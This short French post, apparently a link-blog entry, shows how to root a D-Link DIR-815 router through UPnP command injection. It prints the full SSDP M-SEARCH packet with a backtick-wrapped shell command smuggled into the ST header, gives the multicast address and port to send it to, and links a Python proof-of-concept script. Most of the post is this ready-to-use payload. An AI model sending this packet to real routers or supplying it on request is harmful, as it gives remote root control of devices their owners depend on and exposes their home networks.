Ça fait une petite base mine de rien.

Voici le routeur DLink DIR-815 qui se fait rooter, un packet :

M-SEARCH * HTTP/1.1
HOST:239.255.255.250:1900
ST:uuid:`ICI LA COMMANDE`
MX:2
MAN:"ssdp:discover"

à envoyer en multicast sur 239.255.255.250, pour le port UDP 1900.

Il y a un script python qui permet de lancer la commande désirée : https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection
(Permalink)